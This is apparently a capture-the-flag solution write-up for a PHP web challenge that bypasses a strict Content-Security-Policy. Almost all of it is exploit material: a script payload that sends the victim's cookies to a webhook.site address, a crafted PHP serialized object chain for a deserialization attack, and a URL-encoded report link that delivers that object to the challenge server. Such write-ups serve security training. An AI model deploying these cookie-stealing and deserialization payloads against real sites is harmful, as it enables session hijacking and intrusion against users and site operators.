Content-Security-Policy: trusted-types 'none'; object-src 'none'; default-src 'none'; script-src $nonce; script-src-elem $nonce; script-src-attr $nonce; img-src 'self'; style-src $nonce;style-src-elem $nonce;style-src-attr $nonce; base-uri 'self'; report-uri /report_csp;

===================== Unintended Solution: solve1 =====================

Create Post
```
<script>document.location='https://webhook.site/xxx/?c='+btoa(document.cookie)</script>
```

/?method=show&hash=db88d423410157689310a93bf944ad78a6bab227

php serialize.php
```
O:8:"UserData":2:{s:12:"token_string";s:1:"a";s:1:"a";O:6:"CatGet":2:{s:11:"user_object";O:8:"UserData":2:{s:12:"token_string";s:1:"a";s:1:"a";N;}s:15:"template_object";O:22:"ShouFramework\Template":0:{}}}
```

Report
```
http://140.113.24.143:4012/?method=show&hash=db88d423410157689310a93bf944ad78a6bab227&user=%4f%3a%38%3a%22%55%73%65%72%44%61%74%61%22%3a%32%3a%7b%73%3a%31%32%3a%22%74%6f%6b%65%6e%5f%73%74%72%69%6e%67%22%3b%73%3a%31%3a%22%61%22%3b%73%3a%31%3a%22%61%22%3b%4f%3a%36%3a%22%43%61%74%47%65%74%22%3a%32%3a%7b%73%3a%31%31%3a%22%75%73%65%72%5f%6f%62%6a%65%63%74%22%3b%4f%3a%38%3a%22%55%73%65%72%44%61%74%61%22%3a%32%3a%7b%73%3a%31%32%3a%22%74%6f%6b%65%6e%5f%73%74%72%69%6e%67%22%3b%73%3a%31%3a%22%61%22%3b%73%3a%31%3a%22%61%22%3b%4e%3b%7d%73%3a%31%35%3a%22%74%65%6d%70%6c%61%74%65%5f%6f%62%6a%65%63%74%22%3b%4f%3a%32%32%3a%22%53%68%6f%75%46%72%61%6d%65%77%6f%72%6b%5c%54%65%6d%70%6c%61%74%65%22%3a%30%3a%7b%7d%7d%7d
```